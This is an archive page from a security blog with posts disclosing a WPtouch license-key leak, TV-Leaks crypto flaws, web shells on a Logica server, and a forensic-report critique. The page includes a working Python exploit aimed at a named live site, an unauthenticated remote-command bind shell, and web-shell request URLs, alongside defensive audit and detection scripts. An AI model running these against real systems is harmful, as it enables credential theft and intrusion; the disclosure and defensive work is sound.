Archive for the ‘Security’ Category

0day: Extracting WPtouch Mobile Plugin License Keys

Wednesday, September 24th, 2014

With 6,030,141 downloads the WPtouch Mobile Plugin is currently the 24th most popular WordPress plugin. The plugin offers “pro” functionality for which the users need to pay money. WPtouch suffers from information disclosure vulnerabilities, and today I’m going to demonstrate how to steal license keys. The vulnerabilities seem to affect most versions up until the current 3.4.10; I have not bothered to test them all.

Having a quick peek at the pro functionality, we can discover this beauty:

wptouch_add_pro_setting(
         'checkbox',
         'automatically_backup_settings',
         sprintf( __( 'Automatically backup settings to the %s folder', 'wptouch-pro' ),
         '<em>/wptouch-data/backups</em>' ),
         wptouchize_it( __( 'WPtouch Pro backups your settings each time they are saved.', 'wptouch-pro' ) ),
         WPTOUCH_SETTING_BASIC,
         '3.0'
),

Sounds like a good idea, right? Automatically backing things up, only a fool would mind that!

Let’s have a look at the wptouch_backup_settings() function located in core/admin-backup-restore.php:

$backup_string = base64_encode( gzcompress( serialize( $settings_to_save ), 9 ) );

$backup_base_name = 'wptouch-backup-' . date( 'Ymd-His') . '.txt';
$backup_file_name = WPTOUCH_BACKUP_DIRECTORY . '/' . $backup_base_name;
$backup_file = fopen( $backup_file_name, 'w+t' );
if ( $backup_file ) {
        fwrite( $backup_file, $backup_string );
        fclose( $backup_file );
}

What this tells us is that we can reverse the backup procedure and read the contents of backup files with:

unserialize( gzuncompress( base64_decode( file_get_contents( $backup_file_name ) ) ) );

Naturally, that is more or less precisely what wptouch_restore_settings() does. wptouch_backup_settings() uses pretty much the same call to wptouch_get_settings() as anything else does whenever a WPtouch setting needs to be read. It calls get_settings(), the general method for loading settings, and returns them as expected.

When WPtouch is being configured it calls wptouch_create_directory_if_not_exist() for each directory required by the plugin to function. This is because the plugin relies on directories outside the traditional wp-content/plugins/ directory.

Namely, for backups, WPtouch creates either the wp-content/uploads/wptouch-data/ OR wp-content/wptouch-data/ hierarchy. (There appears to be some sort of difference between versions or installations, something that I have chosen not to dig very deeply into.) By default WordPress is shipped with an index.php file for preventing directory listing in the wp-content directory.

Yeah, you guessed it: WPtouch doesn’t protect the directory listing of its wptouch-data/backups/ directory. This leaves its often automatically created backups, named 'wptouch-backup-' . date( 'Ymd-His' ) . '.txt', completely accessible to anybody who knows where to look. The wptouch-data and wp-content directories may of course be renamed, so being able to determine their paths is a prerequisite for this to work (dork inurl:"wptouch-data").

When get_settings() is called by the backup routine it includes the plugin’s “BNCID” settings which, in turn, contain the customer’s configured e-mail address, license key and WordPress admin nonce. So I guess you could say that an undocumented pro function of WPtouch is to publicly share the pro user’s credentials so that nobody else needs to acquire them on their own. :-)

Proof of Concept

Hacking it all up targeting the least popular site I could find with my very low patience:

#!/usr/bin/env python2
import mechanize
import lxml.html
import phpserialize
import zlib
import base64

WP_CONTENT_URL = "http://holliava.com.au/wordpress/"
haystack = "wp-content/uploads/wptouch-data/backups/"

b = mechanize.Browser()
b.addheaders = [("User-Agent", "MAsTER hAs AWardEd mE yOuR wpTouCh lICeNSe KeY :PppPPppp")]
b.set_handle_robots(False)

url = WP_CONTENT_URL + haystack
print("[+] KnocKING: %s" % (url))

b.open(url)
r = b.response()
d = lxml.html.parse(r).getroot()
needles = [link.attrib.get("href") for link in d.xpath("//a")]

if len(needles) <= 1:
    raise Exception("[-] NO FILez such fAIl ")

print("[+] wOw mUcH fiLE")

for needle in needles:
    if "wptouch-backup-" in needle:
        url = WP_CONTENT_URL + haystack + needle
        d = b.open(url).read()
        objs = phpserialize.loads(zlib.decompress(base64.b64decode(d)), object_hook=phpserialize.phpobject)
        dict = objs[b"bncid"]._asdict()
        cust_email = dict[b"bncid"].decode("utf-8")
        license_key = dict[b"wptouch_license_key"].decode("utf-8")
        print("[+] %s: %s %s" % (needle, cust_email, license_key))

By running it we get (slightly censored):

$ ./sploit.py 
[+] KnocKING: http://holliava.com.au/wordpress/wp-content/uploads/wptouch-data/backups/
[+] wOw mUcH fiLE
[+] wptouch-backup-20131013-022334.txt: [email protected] acb7f-CENSORED-b25b0-a71a8

Possible fixes

  • Deny www access to the WPtouch backup directory and contained files
  • Optionally encrypt the WPtouch backup files with unique keys (per installation or by passphrase)
  • Optionally exclude critical information (is it really necessary for the plugin to backup the license key?)
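
A site owner can check their own installation against the first and third fix from the filesystem. The script below is an added example, not code from the plugin or from the original post: it walks a local wp-content tree, reports backup directories that have neither an index file nor an .htaccess, and decodes each backup to see whether the sensitive setting names are present. The function names and the sample backup (including the stdClass class name) are constructed for illustration.

```python
"""Audit a local WordPress tree for exposed WPtouch settings backups."""
import base64
import os
import sys
import zlib

BACKUP_DIR_SUFFIX = os.sep + os.path.join("wptouch-data", "backups")
INDEX_FILES = ("index.php", "index.html")
# Serialized PHP property names the post says end up in every backup.
SENSITIVE_KEYS = (b"bncid", b"wptouch_license_key")


def make_sample_backup():
    """Constructed sample using the same encoding chain as wptouch_backup_settings()."""
    serialized = (
        b'a:1:{s:5:"bncid";O:8:"stdClass":2:{'
        b's:5:"bncid";s:16:"user@example.com";'
        b's:19:"wptouch_license_key";s:23:"00000-EXAMPLE-KEY-00000";}}'
    )
    return base64.b64encode(zlib.compress(serialized, 9))


def decode_backup(raw):
    """Undo base64_encode(gzcompress(serialize(...))); returns the serialized bytes."""
    return zlib.decompress(base64.b64decode(raw))


def find_backup_dirs(wp_content):
    """Yield every .../wptouch-data/backups directory below wp_content."""
    for root, _dirs, _files in os.walk(wp_content):
        if root.endswith(BACKUP_DIR_SUFFIX):
            yield root


def audit_backup_dir(path):
    """Report listing protection and leaked setting names for one backup directory."""
    names = sorted(os.listdir(path))
    report = {
        "path": path,
        # Neither an index file nor an .htaccess: the web server may list the directory.
        # Files stay fetchable by name either way, so denying access is still required.
        "listing_unprotected": not any(
            n in INDEX_FILES or n == ".htaccess" for n in names
        ),
        "backups": [],
    }
    for name in names:
        if not (name.startswith("wptouch-backup-") and name.endswith(".txt")):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            raw = fh.read()
        try:
            serialized = decode_backup(raw)
        except (ValueError, zlib.error):
            report["backups"].append((name, None))  # not a decodable backup
            continue
        leaked = [k.decode() for k in SENSITIVE_KEYS if b'"' + k + b'"' in serialized]
        report["backups"].append((name, leaked))
    return report


if __name__ == "__main__":
    start = sys.argv[1] if len(sys.argv) > 1 else "."
    for directory in find_backup_dirs(start):
        print(audit_backup_dir(directory))
```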

TV-Leaks Is Broken and Dangerous

Thursday, September 18th, 2014

In 2013 SVT, Sveriges Television, launched its whistleblowing platform inspired by Wikileaks. TV-Leaks intends to make it easier for Swedish whistleblowers to leak sensitive information to journalists. The problem is that TV-Leaks suffers from a long list of vulnerabilities.

Unencrypted attachments

The form allows visitors to upload files. Even worse: if the encrypted message is too long users are recommended to send it as an attachment instead:

// Check that the lenght of the above is not too long
if ($('#encryptedMessage').val().length > 131072)
{
    alert("Meddelande-texten är för lång, prova med att skicka med en bilaga istället.");
    return false;
}

TV-Leaks does not encrypt attachments:

$('#encryptedMessage').val(openpgp.write_encrypted_message(pub_key, message));

Submitting the form with all fields set to “test” and attaching the file “test.txt” containing the string “test” POSTs the following:

-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="title"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="files[]"; filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="department"\r\n\r\nsvtnyheter\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="name"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="phone"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="email"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="encryptedMessage"\r\n\r\n-----BEGIN PGP MESSAGE-----\r\nVersion: OpenPGP.js v.1.20130712\r\nComment: http://openpgpjs.org\r\n\r\nwcBMA9CgkCCRTSS6AQgAgBc3+aFzhuX9d5tqgKmdP7bbsj/HCZgu7Je1qMMs\r\nvefcPPE8gJfpT2zPB023dG11msmbp+3PUXV4qWPYJiwe0CqjshQR6JpdubB7\r\nmP6qrKPiTlOFxaR5E5PTlr0pfdBch6MblCCngQEUVDCcfTIBWnG/4khb+day\r\n8Dd3x0AD8+PmP7EAS2tdv52nwfXc4oMTMhrNRLTBEo0K4osrfr+83WJ62OcN\r\npBkXIpq6MIwPbmeh6HEm6jfrgWmqgYNdOqpkxCF1dwW0f8mC2KKUkhEhbNSd\r\nrFAycEZSEt9rxNNhYRnH/DstM+s8Pf/AgU/mtkNYwSGn8qapvyTPEa/1eiOw\r\nEtJ7ATXj3qFOUuDzoKPkD5KiVmowYX18pcYMkp73ZWe6HBVPPFc9Ir0QGLg2\r\nR9S6IeFBRRnUueYhFCko5gZz5aGrZCGfZOwRQ0bCpRbMvnSEjBZS6JCZYGD2\r\nd9NuSY0qYwQsdGGNb14VFA01gbHQw+1YZvvoAEKY/StL1V6M\r\n=OigO\r\n-----END PGP MESSAGE-----\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="notEncryptedMessage"\r\n\r\n\r\n-----------------------------17354154294744539562044116888\r\nContent-Disposition: form-data; name="submitButton"\r\n\r\n\r\n-----------------------------17354154294744539562044116888--\r\n

Notice that the attached file is sent in plaintext:

filename="test.txt"\r\nContent-Type: text/plain\r\n\r\ntest\n\r\n
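
The same observation can be turned into a repeatable check on a captured request. This is an added example, not code from TV-Leaks or from the original post: it parses a multipart/form-data body and lists every non-empty part that is not an armored PGP message. The boundary, the placeholder ciphertext and the function names are constructed; the field names follow the request shown above.

```python
"""Flag multipart/form-data fields that leave the browser unencrypted."""
from email.parser import BytesParser

ARMOR_BEGIN = b"-----BEGIN PGP MESSAGE-----"
ARMOR_END = b"-----END PGP MESSAGE-----"

# Constructed boundary for the sample request below.
BOUNDARY = "constructedBoundary0001"
SAMPLE_CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_sample_body(encrypt_attachment=False):
    """Constructed POST body shaped like the captured one (placeholder ciphertext)."""
    armored = ARMOR_BEGIN + b"\r\n\r\nCONSTRUCTEDPLACEHOLDER\r\n" + ARMOR_END
    attachment = armored if encrypt_attachment else b"test\n"
    fields = [
        (b'name="title"', b""),
        (b'name="files[]"; filename="test.txt"\r\nContent-Type: text/plain', attachment),
        (b'name="encryptedMessage"', armored),
        (b'name="notEncryptedMessage"', b""),
    ]
    delimiter = b"--" + BOUNDARY.encode("ascii")
    body = b""
    for disposition, payload in fields:
        body += delimiter + b"\r\nContent-Disposition: form-data; " + disposition
        body += b"\r\n\r\n" + payload + b"\r\n"
    return body + delimiter + b"--\r\n"


def plaintext_fields(content_type, body):
    """Return (name, filename, size) for each non-empty part that is not PGP-armored."""
    # The email parser understands MIME multipart once it is given the
    # Content-Type header that the HTTP request carried.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    message = BytesParser().parsebytes(raw)
    if not message.is_multipart():
        raise ValueError("body is not multipart/form-data")
    exposed = []
    for part in message.get_payload():
        name = part.get_param("name", header="content-disposition")
        payload = part.get_payload(decode=True) or b""
        stripped = payload.strip()
        if not stripped:
            continue  # empty form fields carry nothing
        if stripped.startswith(ARMOR_BEGIN) and stripped.endswith(ARMOR_END):
            continue  # encrypted client-side before submission
        exposed.append((name, part.get_filename(), len(payload)))
    return exposed


if __name__ == "__main__":
    for field in plaintext_fields(SAMPLE_CONTENT_TYPE, build_sample_body()):
        print("sent in plaintext:", field)
```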

Outdated and vulnerable OpenPGP.js

TV-Leaks uses OpenPGP.js.

this.versionstring="OpenPGP.js v.1.20130712";

This version is vulnerable to the findings in Cure53’s security audit of OpenPGP.js: Cleartext Messages Spoofing, EME-PKCS1-v1_5 padding uses Math.random(), Cleartext Message Spoofing in Armor Headers, EME-PKCS1-v1_5 Error Handling in RSA Decryption, Errors in EMSA-PKCS1-v1_5 decoding routine and Side-channel leak in RSA decryption, just to mention the most serious issues.

The pubkey

The public key was generated using the dodgy BouncyCastle Java crypto library v1.6.1.0. The public key should be replaced by a key generated by something properly functional and well-tested: GnuPG.

2048 bit keys should be considered as a replacement for the current 1024 bit. NIST has disallowed the use of 1024 bit keys after 31 December 2013 because they are insecure. 1024 bit RSA, which TV-Leaks uses, is broken.

Classical JavaScript verification issue

As usual, JavaScript crypto is a risk by nature since there’s no way for the client to verify that the file sent by the server is the expected file. This is the classic MITM risk with JavaScript crypto, not exclusive to TV-Leaks.

Is TV-Leaks safe to use?

Not at all.

Logica Infiltrated Multiple Times By Automated Tools

Monday, September 15th, 2014

Logica, later CGI, was on the list of hacked companies in what’s been called Sweden’s largest hacking case. In their report on the IT security incident of 2012 they wrote that perpetrators managed to get system access at the end of February 2012, believing 2012-02-25 to be the start date, but that a series of attack attempts were launched earlier.

On 26th August the Swedish Defence Force (Försvarsmakten), FRA (Swedish National Defence Radio Establishment), Swedish Police and Swedish Civil Contingencies Agency held a talk describing modern cyber threats during a conference on information security held by the Swedish government. The talk mentioned the breaches of Logica’s systems but more importantly it was said that Logica had been hacked months before the incidents involving the mainframe had occurred. The PDF containing the slides from the talk can be downloaded here with page 18 showing a screenshot of a mirrored defacement page.

“When the main investigation started, there were a lot of uncertainties on what parts were compromised or which potentially other systems were involved in the incident. Thus there have been a number of different side tracks during the main investigation.” – Logica security incident report page 28

One of those sidetracks involved a computer named SCAP0023 in Logica’s incident report. At this point it is worth clarifying that the PDF file of the incident report available on the Internet has been scanned from its physical copy and then digitized. Some characters are incorrect in the PDF due to the OCR, for example “E” may have been incorrectly recognized as “C”. Quoting Wikileaks on the matter: “The material is formally public, but the Swedish prosecution authority has refused to provide the documents in digital format. Photocopying this volume of paper costs around £350.”

Inspired by the way that the Danish Police is able to conduct forensics analysis and securing evidence without even seeing the computers in question I set out to do the same thing. With a little black Internet magic I waded through the Internet Archive Wayback Machine and discovered 108 mirrored URLs for ux.logica.se – the same Logica domain which was hacked before the mainframe intrusions occurred.

“SCAP0023 Server hosting multiple web servers for many legacy companies in the Logica group, e.g. WM-Data.” – Logica security incident report page 22

For the sake of creating a somewhat easily viewable timeline, the Wayback Machine mirrored URLs in the following order:

May  16 2011 http://ux.logica.se:80/.?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=start
May  17 2011 http://ux.logica.se:80/index.php?page=we_are
May  17 2011 http://ux.logica.se:80/index.php?page=we_do
July 17 2011 http://ux.logica.se:80/index.php?page=contact

One month later, on August 23 2011, Zone-H created the mirror of the defacement page which was included in the talk at the yearly information security conference held by the Swedish government. The ux.logica.se domain had been defaced by ir4dex.

Suddenly the Wayback Machine picked up some interesting paths:

February 15 2012 http://ux.logica.se:80/tmp/cases/case7.php
February 16 2012 http://ux.logica.se:80/tmp/cases/?act=ls&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp&sort=0a
February 17 2012 http://ux.logica.se:80/tmp/cases/
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=about
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=chmod&f=c999sh_backconn.278.c&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp%5Ccases
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=selfremove

Half a year after ir4dex defaced ux.logica.se the Wayback Machine was crawling malicious files on Logica’s server: the C99 and Fx29 PHP shells, two popular tools used as part of automatic website penetration. Not only had Logica been defaced, the Wayback Machine was indexing backdoors six months later.

A cached version of the Fx29 shell reveals a server containing four drives: A:\, C:\, D:\ and E:\. E:\ contained the web root directory, more specifically E:\Inetpub\wwwroot\ux.logica.se\, with 5.31/15 GB disk usage. It was running Microsoft IIS 6.0 and PHP 5.2.9 on Windows NT SE-AP0023 5.2 build 3790 as user IUSR_SE-AP0023.

SE-AP0023 sounds like something that would have been incorrectly read as SCAP0023 during the digitalization of Logica’s security incident report. The server was investigated as a side track. Unfortunately Logica wrote very little about its investigation of this server:

“Appendix Y: SCAP0023/www.wmdata.* investigative side track
The SCAP0023 server is a server hosting web pages for Logica, not their customers. The web pages and the domains associated with that system is to host a legacy web for one of the previous company names and companies that make up the current Logica company. The old company was name “WMData”.

The incident involving SCAP0023 was related to defaced web pages, e.g. unauthorized and maliciously changed web pages.

The detailed info from this incident is based on performing analysis of the disk.

SCAP0023 is a Windows server system running IIS.

The defacement was added on multiple web sites hosted by the SCAP0023 server on August 2011, thus many months before the (current) incident involving the mainframe.

A forensic investigation was initiated on the disks that have been part of the system. The investigation showed that the defacements were performed with automated tools. And that the system were attacked and infiltrated multiple times.” – Logica security incident report page 534

The given description fits perfectly with the hacked SE-AP0023 found through the Wayback Machine. By reading the cached versions of the PHP shell we can extract some more interesting details, the files related to the hack:

February 13 2012 12:42:39 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\
February 13 2012 13:18:24 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.278.c
February 13 2012 13:19:01 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\c999sh_backconn.756.pl
February 13 2012 13:38:17 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\case7.php
February 13 2012 14:40:43 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\nc.exe
February 25 2012 15:42:13 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\attack(1).asp
February 26 2012 07:04:51 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\11.aspx
March    19 2012 05:01:46 E:\Inetpub\wwwroot\ux.logica.se\tmp\cases\sa.php

Logica wrote in its report that it believes 25th February 2012 to be the first day of relevant attacks. You should notice that this was the first day that somebody uploaded a file with an ASP file extension: “attack(1).asp”. However, the server had been defaced and backdoored long before this day, and the only action that Logica took was to remove the defacement page, leaving both vulnerabilities and backdoors in production.

It appears that all intrusions against this webserver occurred through the same vulnerability which enabled attackers to write to the .\tmp\cases\ directory, which in the Wayback Machine’s latest crawl of the PHP shell was listed as both readable and writable for the user serving the web content.
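
The crawled URLs listed above are exactly what a defender would want to catch in their own web server logs. The following is an added example, not part of the original post or of Logica’s report: it flags requests carrying the file-manager style act= values seen in those URLs, absolute Windows paths passed as parameters, and scripts served from a tmp directory. The sample lines are copied from the two timelines above; the rule set and function names are illustrative.

```python
"""Flag web-shell style requests in a list of crawled or logged URLs."""
import re
from urllib.parse import parse_qs, urlsplit

# act= values visible in the crawled URLs quoted in this post.
SHELL_ACTIONS = {"ls", "about", "chmod", "selfremove"}
# Extensions of the files the shell listing showed in .\tmp\cases\.
SCRIPT_EXTENSIONS = (".php", ".asp", ".aspx", ".pl")
WINDOWS_ABSOLUTE_PATH = re.compile(r"^[A-Za-z]:\\")

# Date and URL pairs copied from the two Wayback Machine timelines above.
SAMPLE = """\
May  16 2011 http://ux.logica.se:80/.?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=case_study
May  17 2011 http://ux.logica.se:80/index.php?page=start
May  17 2011 http://ux.logica.se:80/index.php?page=we_are
May  17 2011 http://ux.logica.se:80/index.php?page=we_do
July 17 2011 http://ux.logica.se:80/index.php?page=contact
February 15 2012 http://ux.logica.se:80/tmp/cases/case7.php
February 16 2012 http://ux.logica.se:80/tmp/cases/?act=ls&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp&sort=0a
February 17 2012 http://ux.logica.se:80/tmp/cases/
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=about
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=chmod&f=c999sh_backconn.278.c&d=E%3A%5CInetpub%5Cwwwroot%5Cux.logica.se%5Ctmp%5Ccases
February 17 2012 http://ux.logica.se:80/tmp/cases/?act=selfremove
"""


def classify(url):
    """Return the list of reasons a URL looks like web-shell traffic (empty if none)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # also percent-decodes values
    reasons = []
    for action in query.get("act", []):
        if action in SHELL_ACTIONS:
            reasons.append("file-manager action act=" + action)
    for key in ("d", "f"):
        if any(WINDOWS_ABSOLUTE_PATH.match(v) for v in query.get(key, [])):
            reasons.append("absolute server path in " + key + "=")
    segments = parts.path.lower().split("/")
    if "tmp" in segments[:-1] and segments[-1].endswith(SCRIPT_EXTENSIONS):
        reasons.append("script served from a tmp directory")
    return reasons


def scan(text):
    """Return (date, url, reasons) for every flagged line of 'date url' input."""
    hits = []
    for line in text.splitlines():
        if not line.strip():
            continue
        when, url = line.rsplit(" ", 1)
        reasons = classify(url)
        if reasons:
            hits.append((" ".join(when.split()), url, reasons))
    return hits


if __name__ == "__main__":
    for when, url, reasons in scan(SAMPLE):
        print(when, url, "; ".join(reasons))
```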

Anonymous Cambodia: The OPSEC disaster

Tuesday, June 17th, 2014

On the 30th August, 2012, a group of police officers met outside a local minimart near Riverside in Phnom Penh, Cambodia. Their mission was to raid and arrest anakata in his apartment located nearby as requested by Swedish authorities.

A group of hacktivists that calls itself NullCrew was quick to take revenge, carrying out attacks under the suitably chosen name: “Operation TPB”. On the 2nd September, 2012, they began leaking documents, usernames and passwords from Cambodian computer systems. They attacked the Cambodian Ministry of Public Works, the Institute of Standards, the general taxation department and the military. NullCrew’s attacks hit the local media and this is where the story about Anonymous Cambodia begins.

Most likely inspired by the press coverage of NullCrew’s attacks the Cambodian branch of Anonymous was formed. They adopted NullCrew’s OpTPB and on 12th September, 2012, the day after anakata landed in Sweden, it was reported that Anonymous Cambodia had broken into and leaked sensitive data extracted from the Cambodian Ministry of Foreign Affairs and defaced its website calling for anakata’s release.

The Cambodian branch went silent for a while only to wake up ready for the national elections held in July, 2013. They began defacing sites to spread their political message and DDoSing those that they could not deface, accusing the ruling party of electoral fraud. Their mission was to topple the government led by the Cambodian People’s Party which has ruled the country with an iron fist since the fall of Pol Pot and the Khmer Rouge regime.

“Because he has no formal training and uses programming scripts created by others, he said that he is a ‘script kiddie’ and not a true hacker.”

Less than two weeks before the election Anonymous Cambodia made their grand mistake. They participated in an interview with The Phnom Penh Post in which one of their members, “Black Cyber”, revealed personal information about himself and his agenda. In an interview with The Cambodia Daily he relied on “blacked-out webcam and computer software to distort his voice for fear that the call would be intercepted by U.S. intelligence agencies”.

Black Cyber was portrayed as a twenty-something IT security consultant who had become involved in Anonymous by participating in Operation Payback targeting pro-copyright, anti-piracy organizations and payment processors which had withdrawn banking facilities from WikiLeaks, similar to the attacks which would later be carried out as revenge for the arrest of The Pirate Bay founder anakata. Black Cyber denied involvement in OpTPB.

The interview given by Black Cyber provided excellent profiling data for law enforcement agencies. He revealed the size of Anonymous Cambodia and claimed that three people had participated in attacks against the National Election Committee. Jao Kamsot, another individual who was interviewed for the article, said that he is a script kiddie and not a true hacker.

Immediately after the interview given by Black Cyber the Cambodian Ministry of Interior Department of Security began collaborating with the United States’ FBI in an investigation against Anonymous Cambodia. On 7th April, 2014, 21 year old Bun Khing Mongkul Panha, known online as Black Cyber, was arrested together with 21 year old Chou Songheng, alias Zoro.

The pair was charged with cyber crimes conducted against 30 government websites including the National Election Committee, Ministry of Foreign Affairs, Ministry of Defense, Anti-Corruption Unit and Phnom Penh Municipality. They were charged with unauthorized access to an automated data processing system, obstructing the functioning of an automated data processing system and fraudulent introduction, deletion or modification of data. Black Cyber confessed immediately.

On 22nd April, 2014, an individual calling itself “Attacker Fiber” created a Facebook page named after the group vowing revenge and posting YouTube videos showing how to conduct DDoS attacks. He used the page to market his own page (Attacker-Fiber) on which he advertised “Website Security Learning to be Anonymous” [sic] including SQL injection, defacement and backdoor techniques for $100 per course. He also set up a site titled “Cambodia Security” advertising the same services and posting guides for trivial things such as XAMPP installation.

On 29th April 2014 Anonymous Cambodia claimed on its Facebook page that they had breached the site belonging to the Anti-Corruption Unit promising further attacks. Dim Chaoseng, the lawyer defending the members of Anonymous Cambodia arrested earlier, expressed his concerns saying: “All the activity that Anonymous is doing at the moment is not going to help my clients. It is going to get more difficult to release my clients on bail.”

Only days after the claimed attacks against the Anti-Corruption Unit, on 1st May 2014, two additional (unnamed) members of Anonymous Cambodia were arrested and charged with disrupting the ACU using the moniker Game-Over-xX23xX.

Angered by the four arrests, on the 4th May 2014, the group attacked the Royal Gendarmerie, Ministry of National Defense and CamCERT (Cambodia Computer Emergency Response Team) demanding the release of their “comrades”. Military Police spokesman Kheng Tito was quoted saying: “I don’t think their group has many people, and we will wipe it out.”

On 4th June Attacker Fiber, a 17 year old boy named Chin Neangleangmeng, became the 5th arrested member of Anonymous Cambodia. He confessed immediately.

Since the arrest of Attacker Fiber the small but very cocky group has been very quiet online. Anonymous Cambodia is now held in Prey Sar Prison in Phnom Penh, which was built for 500 inmates but was reportedly the home of 3,000 inmates in 2011, and they will most likely stay there until the authorities figure out how to punish them as Cambodia is currently lacking many internationally common cybercrime laws to regulate hacking and DDoS attacks.

anakata’s uncontrollable computer

Thursday, September 5th, 2013

IT security specialists working for the Swedish Security Service Department of Information Security and Preservation of Evidence in IT environments performed forensic analysis on a computer seized from GSW, specifically seizure 2012-0201-BG25023-26, and concluded that it would be impossible to remotely control it without leaving traces. The problem is that they are wrong. The investigation report was originally written in Swedish; my translated version can be downloaded here.

The forensic analysis was limited by the assumption that computers can only be remotely controlled via legitimate remote control services, such as Terminal Services and PowerShell. It focused on the services mentioned by the defendant and thus bypassed the possibility that, just like Nordea’s and Logica’s computers, the seized computer might simply have been hacked without the defendant’s knowledge, just as Logica was undetectably hacked for at least two years.

Yesterday, when Jacob Appelbaum was heard as an expert witness called by the defense, the author of the report admitted that all contents of the seized computer’s hard drive had not been analyzed and that he is not a Windows expert.

The analysis assumes that only one firewall was present in the network: Windows Firewall, despite there being records of “plastic cover belonging to router” being handed over to Swedish authorities by Cambodian authorities. The router’s model version and firmware settings are unknown as it has been neither documented nor analyzed. Apparently seizing the plastic cover was a higher priority.

In their investigation the Security Service shows that Adobe Flash Player versions 11.0r1, 11.2.d202, 11.3.r300, 11.3.r400 and 11.3.402 had full permissions in the seized computer’s Windows Firewall rules to communicate over both TCP and UDP over any port in any direction. These versions of Adobe Flash Player are vulnerable to over 100 security issues which can be exploited to execute code through so-called remote code execution exploits.

The computer’s Windows Firewall also allowed the Python interpreter to, just like all the other whitelisted applications, communicate over both TCP and UDP on any port and on any network device. Without going into further details in this post, here is a simple example of how a computer can be remotely controlled without leaving traces via Python:

import socket, subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bind to port 9999 (example) on any network device
s.bind(("", 9999))
s.listen(1)
# Accept connections from clients
conn, addr = s.accept()

# Loop forever
while 1:
  # Read command sent from client
  data = conn.recv(1024)
  # Close link if no command is received
  if not data: break
  print("[+] Connection established")
  # Execute received command
  output = subprocess.check_output(data.decode().rstrip())
  # Send output of executed command back to the client
  conn.send("OUTPUT\n------\n".encode())
  conn.send(output)

conn.close()

When running the script above it creates a socket that listens on port 9999 which accepts connections on any network device on the computer. It then waits for clients to connect to it, reads received commands, executes them and returns the command output to the client. It’s not even complicated.

As an example this is what it looks like when a client connects to the server and lists the files in the current directory:

> telnet localhost 9999
Connected to localhost.
Escape character is '^]'.
ls
OUTPUT
------
server.py

In addition, the same scenario applies to another piece of software which was both installed and fully allowed in the local firewall: Neko.

Additionally the computer had both the OpenVPN client and server software installed enabling outsiders to connect to the computer and connecting the computer to additional networks, forming a Virtual Private Network, which is a globally routed virtual LAN. By directly connecting to the computer or by connecting the computer to an existing VPN other clients in the same VPN can share local resources, like harddrive storage, across the network.

Essentially it all boils down to this: it is up to the software which enables remote control functionality to save logs to the hard drive. If the programmer doesn’t explicitly write such logging functionality, as in the Python example given above, logs are simply not stored on disk. Windows does not write every network-transmitted bit to the disk, and unless someone logs their own backdooring it’s not going to be detected through forensics. Nor is the Python example demonstrated above detected by antivirus software, as it performs completely normal network operations.

You can obtain my somewhat lengthy comments written on this matter here. Please keep in mind that it was written under somewhat stressed circumstances where technological facts were more prioritized than human linguistic expression and spelling.

With more than 100 possibilities to remotely control the defendant’s computer without leaving traces, counting only those circumstances that paint the environmental picture in the Security Service’s investigation, it is absurd to claim that it would be impossible to remotely control the seized computer without leaving traces.

The authorities worked around the prerequisites of justice when they first seized a router’s plastic cover instead of the router itself and later focused selectively on Windows Firewall. Analyzing the plastic cover would have had the same relevance as the investigation of remote control possibilities conducted by the Swedish Security Service.

Making the possible seem impossible is easy when the defendant’s documents are locked in a secret cabin and nobody has the ability to question you, but such actions do not promote true possibilities. It seems like the investigators were biased.

Solving the browser crypto problem

Sunday, July 14th, 2013

Many developers have worked hard to port critical cryptographic functionality to JavaScript. We all agree that there is a clear requirement in a safer world to have asymmetric crypto support in the web. Porting code to JavaScript is great for users that don’t really care about the strength but only that the data is encrypted. Those people usually believe that they do not need perfect crypto, as long as it is any form of crypto it is “good enough” for them.

There are many problems with porting cryptographic functions directly to JavaScript and we see many great ideas failing to do things properly. JavaScript cryptography is very young when comparing its lifespan to established binary solutions, such as GnuPG, that have been audited for a long time. GnuPG has been around since 1999 and GPG4Browsers, now OpenPGP.js, since 2011.

Auditing JavaScript ports leads to better design and fewer failures over time, but even when everything has been solved some problems remain due to design. Web browsers live in a very hostile world and we systematically witness XSS vulnerabilities and 0day exploits which enable dumping critical data, like private keys, as soon as either the DOM or HTML5 local storage is accessed. We can take care of badly implemented cryptography but we can’t take care of the way that the JavaScript implemented cryptography is accessible to anything that can execute JavaScript in the correct environment. As long as cryptography is done in JavaScript this will always be a huge threat.

